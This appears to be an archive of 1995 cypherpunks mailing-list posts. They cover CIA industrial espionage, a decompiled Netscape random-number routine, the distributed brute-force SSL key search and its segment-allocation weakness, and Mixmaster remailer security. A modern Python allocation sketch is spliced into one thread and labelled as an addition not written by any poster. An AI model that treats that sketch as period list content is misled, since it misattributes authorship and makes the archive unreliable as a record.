Any chance you can put them back to "ssl" so folks can test their clients?


Regards,

- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 30 Aug 95 08:17:04 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
In-Reply-To: <9508301246.AA14561@elysion.iaks.ira.uka.de>
Message-ID: <9508301516.AA32040@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>In a german weekly news magazine (Focus 34/1995, p. 178-181) I read an
>article about industrial espionage. It is said that the secret
>services have lost their main task when the east/west cold war had
>gone. Their new task is the industrial espionage. The russian, french,
>and american services were referenced in the article.

The cold war isn't so decisive. Much of espionage has always been industrial. It 
is an essential component of political espionage in any case. Military espionage 
may get the headlines but the bulk of the work is trawling through trade stats 
and various open networks in embassies etc.

In any case with the breakup of the USSR there are now more states to watch and 
because they are unstable more need to watch them.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Wed, 30 Aug 95 08:17:50 PDT
To: cypherpunks@toad.com
Subject: Re: Modern Journalism (was: All about Bernstein) (fwd)
Message-ID: <Pine.3.89.9508301119.A6002-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, folks, I thought I'd cc:ed this to the list.

---------- Forwarded message ----------
Date: Sun, 27 Aug 1995 20:08:22 +0059 (EDT)
From: Peter F Cassidy <pcassidy@world.std.com>
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Modern Journalism (was: All about Bernstein)



I agree. Some editors refuse to let actors be engaged as professionals
only. My philosophy is people's stories are their own and they are in
control of them to the extent they inform these stories. WIRED likes to
find crusaders and campaigners for their profiles. Sometimes they're not
the swashbuckling types that make for engaging personality pieces. That's
why I went for the issues around ITAR and a speculation on the case's
merits in relative case law and the judicial environment it will enter. 
DJB got eloquent where I thought it was important in terms of the
technology and research running up against a law that is itself full of
negotiable loopholes, quiet on everything else. Most everyone who's met
him tells me he's really retiring. Which led me to conclude the guy might
have the kind of reserve and restraint required for protracted litigation
with the government which essentially becomes an endurance contest.
Now, saying that, is it weird to think that people would be interested in
a fellow like that? Wrong?
	I've written about large scale bank frauds, organized crime,
charities frauds, etc. and even when I'm writing about gangsters, personal
detail isn't used for "spice" as much as it is narrative coherence. Who
introduced the arsonist to the drug dealer to do the condo deal? Is that
gossip or an essential detail? In science writing the personal detail
illuminates sometimes, not always, the actors involved in great discovery.
Is it prying to learn that Maslow felt better after he married his goofy
fourth cousin and came up with the theory of the hierarchy of needs? No, but
it makes the story of the science more resonant. That's not a bad thing.
	There is undoubtedly a peoplemagazinification of journalism in 
the states which is why I gravitate toward the analytic or investigative 
publications like the Economist, Covert Action Quarterly or the Texas 
Observer, The Progressive and good trades like CIO. Yet even in these 
publications, the examination of protagonists is not considered out of 
bounds. I think it's not in your interest to be sniffing at the press. 
Tell them exactly what you wrote here and take these guys for a ride. 
Freeh has managed to make himself out to be this tower of virtue and 
civil leadership  -  well, up until recently and, you'll remember, led a 
successful charge for passage of the digital telephony bill which will be 
the model for crypto legislation, at least in terms of lobby tactics if 
not language. He did this partly by force of personality and his 
credibility. He didn't gain these by being precious about himself or his 
enterprise or, finally, by being a good cop or jurist. He did it with 
great PR and a sense of how the press works, not by whingeing when an 
interview opportunity came around. 
	Levy, if anything, is doing all cryptodom a favor if average 
schmucks pick up his book and say, gosh, is *that* what is at stake here? 
His NYT piece was clear and straightforward - engaged the science of 
crypto seriously and at the level the reader could handle - and made 
the protagonists and antagonists accessible. Right now, crypto is not 
even on the map. Creating a barricade around the people that are driving 
this defining technology does no one any good. In fact, when it comes 
down to the end-game, legislating a ban on non-escrowed crypto, the first 
thing the Justice department will do is characterize you guys as amoral 
eggheads who are building technologies to hide the crimes of terrorists, 
rapists, genocidists and maniacs. At that point, I should think you would 
like to be appreciated as scientists with principles you act on in daily 
life and in your work, gosh, even personal philosophies, real personal stuff 
like that.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Wed, 30 Aug 95 11:32:59 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <v02130503ac6a6e5a7a01@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 8/30/95, Dar Scott wrote:
>In responding to Hadmut John Young seems to have quoted IWR Daily
>Update in writing,
>>  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
>>
>>   President Clinton has ordered the CIA to make economic
>>espionage
>>   against our trade rivals a top priority. [sources: Los
>>Angeles Times-
>>   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles,
>>7/23/95]
>
>Are we to assume both black and white?
>
>Will the CIA have access to escrowed keys in exported software?

Perhaps if economic espionage is such a high priority, then we'll have
to start using more secure keys in the future. After all, any international
corporation limited to using limited bit encryption schemes is just asking
for its rivals to start grabbing the traffic and stealing their information.

Jonathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skapp@cix.compulink.co.uk (Stephen Kapp)
Date: Wed, 30 Aug 95 03:50:36 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape's RNG
Message-ID: <memo.573779@cix.compulink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In-Reply-To: <199508300512.BAA23185@calum.csclub.uwaterloo.ca>
> -----8<-----8<-----
> #include <string.h>  /* memcpy */
> 
> /* MD5_Begin, MD5_Update and MD5_End are not shown in the post. */
> struct RNG
> {
>     unsigned char md5bytes[0x10];
>     unsigned char randbytes[0x10];
>     int size;
>     void *md5data;
> };
> 
> int RNG_GenerateRandomBytes(struct RNG *i0, char *i1, int i2)
> {
>     char buf[0x20];
>     int err, o2;
>     unsigned char *o1;
> 
>     while (i2 > i0->size)
>     {
>       /* hand out what is left of the current 16-byte block */
>       memcpy(i1, i0->randbytes+0x10-i0->size, i0->size);
>       i1 += i0->size;
>       i2 -= i0->size;
>       /* next block: randbytes = MD5(md5bytes) */
>       if (err = MD5_Begin(i0->md5data)) return err;
>       if (err = MD5_Update(i0->md5data, &(i0->md5bytes), 0x10)) return err;
>       if (err = MD5_End(i0->md5data, &(i0->randbytes), buf, 0x10)) return err;
>       i0->size = 0x10;
>       /* bump md5bytes from the last byte backwards; the loop stops
>          after incrementing a byte whose old value was non-zero */
>       o2 = 0;
>       o1 = &(i0->md5bytes[0x0f]);
>       do
>       {
>           if ((*o1)++) break;
>           --o1;
>       } while (++o2 <= 0x0f);
>     }
> 
>     /* i2 <= i0->size */
>     memcpy(i1, i0->randbytes+0x10-i0->size, i2);
>     i0->size -= i2;
>     return 0;
> }
> -----8<-----8<-----
> 

This looks very much like the RSAREF random number code, there are a few 
minor differences, but it still looks very similar.

---------------------------------------------------------------------------
E-mail: skapp@cix.compulink.co.uk, 
        skapp@sourcery.demon.co.uk
PGP fingerprint: 78 1C CD F4 A4 44 D2 CB  DD A5 CF EF F1 DD D8 6A
---------------------------------------------------------------------------
RSAEURO:        rsaeuro@sourcery.demon.co.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 30 Aug 95 11:02:56 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <v01510100ac6a56311cf4@[198.59.115.111]>
MIME-Version: 1.0
Content-Type: text/plain


In responding to Hadmut John Young seems to have quoted IWR Daily
Update in writing,
>  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
>
>   President Clinton has ordered the CIA to make economic espionage
>   against our trade rivals a top priority. [sources: Los Angeles Times-
>   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles, 7/23/95]

Are we to assume both black and white?

Will the CIA have access to escrowed keys in exported software?

---Dar
(list newbie)


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 30 Aug 95 11:14:55 PDT
To: ab411@detroit.freenet.org
Subject: Re: SSL search attacks
In-Reply-To: <199508301056.GAA26657@detroit.freenet.org>
Message-ID: <9508301813.AA12150@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


David R. Conrad writes
>Scott Brickner <sjb@austin.ibm.com> writes:
>>don@cs.byu.edu writes
>>>A random (instead
>>>of sequential) allocation _by the keyserver_ (out of unallocated 
>>>piecemeal segments) would also take some work to implement. 
>>
>>The problem is that it's irrelevant to the problem.  Random allocation
>>at the server is equivalent to simply "shuffling" the segments before
>>assignment, which doesn't affect the rate at which the space is searched.
>
>The point is that if J. Random Badguy knows that the key lies in segment
>0x1bad and wants to get this segment and send a false NAK for it, he can
>watch as key segments are doled out (perhaps with clients running on a
>number of machines) and when 0x1bad gets close, say, when 0x1b0b comes
>out, he can instruct all his clients to start hammering the server for
>all they're worth in an attempt to get the key segment assigned to one
>of his clients.
>
>If the segments are shuffled before they are handed out then this attack
>becomes impossible, since the attacker has no way of knowing when
>segment 0x1bad will be handed out.

An excellent point.  One I'd missed.  I agree that a random shuffle
of segments is appropriate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 30 Aug 95 10:22:06 PDT
To: danisch@ira.uka.de
Subject: CIA & Espionage
Message-ID: <199508301721.NAA10401@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by danisch@ira.uka.de (Hadmut Danisch) on 
Wed, 30 Aug  2:46 PM


>It was said that Pres. Clinton had given a speech while 
>visiting the CIA HQ in Langley/Virginia. He allegedly 
>said in this speech that obtaining industrial 
>information has the highest priority and this was the 
>new task for the spies.
>
>Can anyone confirm the quotation?


Hadmut,


This is excerpted from:

     http://www.awpi.com/IntelWeb/IWR/Updates/2/181.html

----------

IWR Daily Update Vol. 2, No. 181

  JULY 24, 1995
  
     
_________________________________________________________________

   

  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
  
   President Clinton has ordered the CIA to make economic espionage
   against our trade rivals a top priority. [sources: Los Angeles Times-
   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles, 7/23/95]

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Frissell@panix.com)
Date: Wed, 20 Sep 95 16:29:33 PDT
To: cypherpunks@toad.com
Subject: MORE DISINTERMEDIATION
Message-ID: <9509201546295337@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 10:33:33 -0400
To: cypherpunks@toad.com
From: Duncan Frissell <frissell@panix.com>
Subject: More Disintermediation

According to Monday's USA Today, the Customs Service has come up with a plan
to stop stopping international travelers arriving at US airports.
Apparently they can't afford "personal" service any more.  With 60 million
arrivals, Customs has decided to mingle a bit in luggage claim, look for
those meeting its profiles, and use drug- and food-sniffing dogs to catch
smugglers.

Note that international travel has doubled in the last few years.  What is
Customs (and La Migra) going to do when it doubles again?  It is much easier
for market phenomena like this to double or triple than it is for
government agencies to double or triple.  

Markets scale well.  Governments don't.

DCF

"When foreigners steal 'our' jobs, our labor is freed for other tasks and
total world product increases.  Jobs can no more 'run out' than desire for
things in general can 'run out'."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 30 Aug 95 05:49:53 PDT
To: cypherpunks@toad.com
Subject: CIA & Espionage
Message-ID: <9508301246.AA14561@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


In a German weekly news magazine (Focus 34/1995, p. 178-181) I read an
article about industrial espionage. It is said that the secret
services have lost their main task when the east/west cold war had
gone. Their new task is the industrial espionage. The Russian, French,
and American services were referenced in the article.

It was said that Pres. Clinton had given a speech while visiting the
CIA HQ in Langley/Virginia. He allegedly said in this speech that obtaining
industrial information has the highest priority and this was the new
task for the spies.

Can anyone confirm the quotation?

Hadmut






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 11:56:15 PDT
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: CIA & Espionage
In-Reply-To: <9508301246.AA14561@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950830145316.6286B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Hadmut Danisch wrote:

> Date: Wed, 30 Aug 1995 14:46:23 +0200
> From: Hadmut Danisch <danisch@ira.uka.de>
> To: cypherpunks@toad.com
> Subject: CIA & Espionage
> 
> In a German weekly news magazine (Focus 34/1995, p. 178-181) I read an
> article about industrial espionage. It is said that the secret
> services have lost their main task when the east/west cold war had
> gone. Their new task is the industrial espionage. The Russian, French,
> and American services were referenced in the article.
> 
> It was said that Pres. Clinton had given a speech while visiting the
> CIA HQ in Langley/Virginia. He allegedly said in this speech that obtaining
> industrial information has the highest priority and this was the new
> task for the spies.
> 
> Can anyone confirm the quotation?

Yes.

I've been told the same thing.  Moreover, I believe the quotation, not 
because of the source of confirmation, but because it fits right into the 
direction most of the intelligence agencies have been taking since the 
revelation that the French had won out a multi-billion $ contract for air 
traffic control because the French service had, through various espionage 
methods, determined the U.S. bidding position and such.

Sorry I can't give attribution for the confirmation.

> 
> Hadmut
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 11:58:37 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: CIA & Espionage
In-Reply-To: <v01510100ac6a56311cf4@[198.59.115.111]>
Message-ID: <Pine.SUN.3.91.950830145814.6286C-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Dar Scott wrote:

> Date: Wed, 30 Aug 1995 12:02:48 -0600
> From: Dar Scott <dsc@swcp.com>
> To: cypherpunks@toad.com
> Subject: Re: CIA & Espionage
> 
> In responding to Hadmut John Young seems to have quoted IWR Daily
> Update in writing,
> >  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
> >
> >   President Clinton has ordered the CIA to make economic espionage
> >   against our trade rivals a top priority. [sources: Los Angeles Times-
> >   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles, 7/23/95]
> 
> Are we to assume both black and white?
> 
> Will the CIA have access to escrowed keys in exported software?

Duh.

> 
> ---Dar
> (list newbie)
> 
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790  <---
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> My preference for attached files are in this order:
> AOL, Mime, Binhex4, PGP, UUencode
> ===========================================================
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 16:37:02 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <9509201546295340@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 95 11:16:01 -0400
From: hallam@w3.org


>In a German weekly news magazine (Focus 34/1995, p. 178-181) I read an
>article about industrial espionage. It is said that the secret
>services have lost their main task when the east/west cold war had
>gone. Their new task is the industrial espionage. The Russian, French,
>and American services were referenced in the article.

The cold war isn't so decisive. Much of espionage has always been industrial. It
is an essential component of political espionage in any case. Military espionage
may get the headlines but the bulk of the work is trawling through trade stats 
and various open networks in embassies etc.

In any case with the breakup of the USSR there are now more states to watch and
because they are unstable more need to watch them.

        Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Wed, 30 Aug 95 14:49:03 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attack
Message-ID: <199508302142.PAA00178@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Scott Brickner <sjb@austin.ibm.com>
>>If the segments are shuffled before they are handed out then this attack
>>becomes impossible, since the attacker has no way of knowing when
>>segment 0x1bad will be handed out.
>
>An excellent point.  One I'd missed.  I agree that a random shuffle
>of segments is appropriate.

Problem is, though, if *each* segment is shuffled, or shuffled in groups
of 10 or 25 or 50 or what? brutessl is designed for sequential search
through a block of segments. I was pulling down blocks of up to 40 segments 
each, for each machine I was running. Of course, with brloop running I
won't be in such a bind (I have yet to see that it really works though..)
but still it also represents a coding problem as to handing out sequential
segments within shuffled blocks.

Hey, by the way Piete, is there gonna be a ego list (rankings) like there
was with the RC4? 

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMETbAMLa+QKZS485AQFU7QL/WTljlZyetr0x+L9eBJnrYUNNY1BHfTJn
C83wiJgPO5cpR6b/Vn8hYPnMRXnEhaxRJ062TcRitdngsUND1W+6d04Ph1gg/Qj8
US6FtoP+Yk9BhcYlYfogh3YSOxcgIvbu
=UiWq
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 30 Aug 95 08:20:32 PDT
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: SSL brute/ng
In-Reply-To: <Pine.3.89.9508292354.C13222-0100000@wane3.scri.fsu.edu>
Message-ID: <"swan.cl.cam.:068200:950830151949"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> If anyone is putting together a wish list of features for the next 
> iteration of the distributed brute

Sure am ....

> would they like to consider some sort of mirroring approach for the server
> (at least on stats or updates/software)

Not sure what you mean ....

Currently there are many machines involved ...

sksp		odd & sods.
sksp-ack	just ACKs.
sksp-key	just keyspace allocation
ftp		just FTPs
www		just WWW

stats are WWW only, with updates being done by ACKs machine.

> so that some of that traffic could be reduced?

How ?

> I'm afraid I am one of the guilty trying to log on to check on the stats at
> least once and I probably contributed to choking it just by doing that.

Nah ....

> If a local server

local to whom ?

Using a caching poxy ?

> could have been updated, it would save bandwidth on the server doing real
> work.

No -- different server.
 
> Could a trusted group of segment dolers be put together?

As in a hierarchy ?
This is being thought about ...

> I like the idea of running a benchmark type of program so that I could
> multiply keys/sec times the amount of time I had to donate, and only get a
> reasonable for me number of segments.

brloop does that for brutessl attempts ...

> I would hope that statistics be gathered on the number of keys tested, 
> elapsed time, etc. so that we all got some more or less real world 
> insight into key lengths and strengths, effort required to break, that we 
> have all heard so many projections about... especially as the doling gets 
> more sophisticated and the number of participants/cycle pool increases.

Let me know what stats you want ...

> Will there be Hal3?  

Yes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 29 Aug 95 23:35:38 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508282255.AA46059@junkers.lochard.com.au>
Message-ID: <Pine.SUN.3.91.950830163405.10950W-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Aug 1995, Mark wrote:

> I think the officer arresting you would frown if your license dumped a nudie
> picture of Cindy Crawford instead of your identification details.

"I have no idea how that happened, Officer - you know these things can't
 be forged!"

Nothing like sowing the seeds of doubt amongst those whose job it is to
enforce it...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 30 Aug 95 15:03:32 PDT
To: don@cs.byu.edu
Subject: Re: SSL search attack
In-Reply-To: <199508302142.PAA00178@wero>
Message-ID: <9508302203.AA16891@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes
>From: Scott Brickner <sjb@austin.ibm.com>
>>>If the segments are shuffled before they are handed out then this attack
>>>becomes impossible, since the attacker has no way of knowing when
>>>segment 0x1bad will be handed out.
>>
>>An excellent point.  One I'd missed.  I agree that a random shuffle
>>of segments is appropriate.
>
>Problem is, though, if *each* segment is shuffled, or shuffled in groups
>of 10 or 25 or 50 or what? brutessl is designed for sequential search
>through a block of segments. I was pulling down blocks of up to 40 segments 
>each, for each machine I was running. Of course, with brloop running I
>won't be in such a bind (I have yet to see that it really works though..)
>but still it also represents a coding problem as to handing out sequential
>segments within shuffled blocks.

Well, the only real issue is that the requestor *not* be able to
reliably predict which segments will be assigned.  The server may adopt
a strategy of picking a random block of segments for each request.
This introduces a certain amount of fragmentation into the process, but
there are strategies to minimize this.  It may be enough to break up
keyspace into, say, 32 "regions", and fill requests sequentially, but
from a randomly selected region.
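
The allocation strategy discussed in this thread, as an added sketch (not code from the key-search server or from any poster): requests are filled sequentially, but from a region chosen with a CSPRNG, and `hit_probability` shows how little a requester who has watched every earlier assignment can predict about the next one. The names `RegionAllocator`, `hit_probability`, `drain` and `demo`, the 16-bit segment numbering and the cursor positions set in `demo` are assumptions made for the illustration.

```python
import secrets


class RegionAllocator:
    """Key-space segment server: sequential inside a region, random across regions.

    regions=1 models the original purely sequential hand-out.
    """

    def __init__(self, total_segments=0x10000, regions=32, rng=None):
        if total_segments % regions:
            raise ValueError("regions must divide the segment count evenly")
        self.region_size = total_segments // regions
        # Next unassigned segment of each region, and each region's end (exclusive).
        self.cursor = [r * self.region_size for r in range(regions)]
        self.end = [(r + 1) * self.region_size for r in range(regions)]
        # The region choice must come from a CSPRNG: a seeded or time-based
        # generator would let a requester reconstruct the order.
        self.rng = rng if rng is not None else secrets.SystemRandom()

    def _open_regions(self):
        return [r for r in range(len(self.cursor)) if self.cursor[r] < self.end[r]]

    def allocate(self, count):
        """Return (first_segment, length) with length <= count, or None when done.

        A run never crosses a region boundary, so a request near the end of a
        region comes back short; that is the fragmentation cost of the scheme.
        """
        open_regions = self._open_regions()
        if not open_regions:
            return None
        r = self.rng.choice(open_regions)
        n = min(count, self.end[r] - self.cursor[r])
        start = self.cursor[r]
        self.cursor[r] += n
        return start, n

    def hit_probability(self, target, count):
        """Chance that the next request for `count` segments includes `target`,
        for an observer who knows every cursor (the worst case)."""
        open_regions = self._open_regions()
        r = target // self.region_size
        if r not in open_regions:
            return 0.0
        if self.cursor[r] <= target < self.cursor[r] + count:
            return 1.0 / len(open_regions)
        return 0.0


def drain(alloc, block):
    """Request blocks until the key space is exhausted; return all runs."""
    runs = []
    while (run := alloc.allocate(block)) is not None:
        runs.append(run)
    return runs


def demo(target=0x1BAD, block=40):
    """Constructed state: the cursor sits five segments below `target`."""
    sequential = RegionAllocator(regions=1)
    regional = RegionAllocator(regions=32)
    sequential.cursor[0] = target - 5
    regional.cursor[target // regional.region_size] = target - 5
    return (sequential.hit_probability(target, block),
            regional.hit_probability(target, block))


if __name__ == "__main__":
    seq_p, reg_p = demo()
    print(f"sequential server: next block contains 0x1bad with p={seq_p}")
    print(f"32 regions:        next block contains 0x1bad with p={reg_p}")
```

Setting `regions` equal to `total_segments` gives every segment its own region, which is the full shuffle proposed earlier in the thread; fewer regions keep blocks contiguous for clients at the price of a higher per-request probability.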




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 30 Aug 95 17:57:06 PDT
To: scmayo@rschp1.anu.edu.au
Subject: Is the book Network Security any good?
Message-ID: <9508310053.AA01365@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone read the book "Network Security Private Communication in a 
PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
Speciner, and has a copyright date of this year.

Is it good?  What's the level?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller Mixmaster <hroller@c2.org>
Date: Wed, 30 Aug 95 18:47:02 PDT
To: mix-l@jpunix.com.cypherpunks@toad.com
Subject: Mixmaster Security Issues
Message-ID: <199508310117.SAA20828@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Apart from thwarting traffic analysis attacks, how does the security
of a Mixmaster Type II remailer packet compare to that of a
PGP-chained Type I message?

For example, is each remailer in the path limited to knowing only
the next remailer in the path?  Is there any way for a remailer
(except for the first and last in the chain) to know how many hops
have already occurred or how many remain?  Is there a session key
chosen via an RNG?  If so, how random is the RNG?  Is it seeded from
a pseudo-random source that's at least as secure as measuring
keystroke latencies, as PGP does?

Lance Cottrell's original "remailer essay" which proposed the Type
II concept envisioned, if I'm not mistaken, the use of PGP
technology to do the actual encryptions.  Now it seems that another,
seemingly proprietary, implementation of RSAREF was used, instead.
What was the reason for this change?

Would any security be lost if Type I and II technology were combined
and a PGP-chained Type I packet were initially sent via Mixmaster?
This would seem to provide the necessary protection against
traffic analysis while bypassing any *POSSIBLE* hidden weaknesses in
Mixmaster.  IOW, if the outer Mixmaster "envelope" were "steamed
open", perhaps based on some hidden weakness in Mixmaster, the
inner, nested PGP envelope(s) would remain intact.

BTW, what volume of message traffic is the Mixmaster network of
remailers currently handling?  Is much cover traffic necessary to
minimize delays while providing enough reordering to thwart traffic
analysis?  (IOW, so a remailer with a reordering pool size of five
messages, and averaging one REAL message a day, wouldn't have to
keep a message for an average of five days before sending it on its
next hop, as a worst-case scenario).

Is my math correct in surmising that chaining a message through five
remailers, each with a reordering pool of five messages, could mean
that the message eventually leaves the chain as one of 5^5 (3125)
possible messages?  (My math is a bit weak, so please feel free to
correct my methodology, if necessary.)  If so, does that work in
reverse?  Could a given output message that finally surfaced in the
clear be narrowed down to one of 3125 Mixmaster input messages
through traffic analysis?  Or would the fact that the attacker
didn't know the exact number of hops utilized significantly increase
the odds against identifying the sender?  What effect, if any, would
increasing the number of available remailers have on traffic
analysis?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 30 Aug 95 18:13:30 PDT
To: cypherpunks@toad.com
Subject: Ajax
Message-ID: <199508310015.TAA04710@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



A source for links to the Intelligence Community:

URL: http://www.interport.net/~sagal/ajax.html

----------

                         AJAX
   
      UNITED STATES AND INTERNATIONAL GOVERNMENT
        MILITARY AND INTELLIGENCE AGENCY ACCESS

            
Last update: 16 AUG 95. All accesses verified at time of
inclusion.

Certain locations or sections thereof may be closed to
unauthorized use. Please read access warnings, if any,
and abide by them.
    
_______________________________________________________
   
United States Government Intelligence and Law Enforcement
Agency Servers

   ATF (Bureau of Alcohol, Tobacco and Firearms)
   BOP (Federal Bureau of Prisons)
   CIA (Central Intelligence Agency)
   COPNET
   FBI (Federal Bureau of Investigation)
   FINCEN (Federal Crimes Enforcement Network)
   FLETC (Federal Law Enforcement Training Center)
   HEROES (U.S. Department of State Diplomatic Security
      Service Counter-Terrorism Rewards Program)
   MARSHALS (U.S. Marshals Service)
   NLETC (National Law Enforcement Technology Center)
   SS (Secret Service)


United States Military Branch Servers

   NATGUARD (Army and Air National Guards)
   USA (United States Army)
   USAF (United States Air Force)
   USCG (United States Coast Guard)
   USMC (United States Marine Corps)
   USN (United States Navy)
   
          
United States Military & Defense Agency Servers

   ACC (Air Combat Command)
   AFIN (U.S. Air Force InterNet)
   AFOS1 (1st Security Police Squadron, Langley Air Force
      Base)
   CHIEFS (Joint Chiefs of Staff)
   DEFENSE (Defense Department)
   DISA (Defense Information Systems Agency)
   DRMS (Defense Reutilization and Marketing Service)
   NEW (8/16/95)
   DTIC (Defense Technical Information Center)
   NAVWAN (Naval Aviation Systems Team Wide Area Network)
   NAWCWPNS (Naval Air Warfare Center Weapons Division)
   NCS (National Communications System)
   NSWC (Naval Surface Warfare Center)

          
